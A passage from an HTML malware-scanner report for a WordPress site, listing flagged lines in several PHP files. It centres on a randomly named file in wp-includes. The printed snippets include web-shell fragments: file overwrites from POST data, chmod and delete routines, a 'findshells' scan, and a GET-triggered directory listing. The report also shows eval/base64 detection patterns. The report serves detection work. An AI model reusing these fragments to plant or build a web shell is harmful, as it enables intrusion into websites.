</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 990</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FUNCTION__</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">wp_remote_retrieve_headers</span><span style="color: #007700">( </span><span style="color: #0000BB">$response </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">DateTimeImmutable Date </span><span style="color: #007700">and </span><span style="color: #0000BB">time object</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_52").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/jEIC3bil4xQ.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 19:29:40</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_53" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
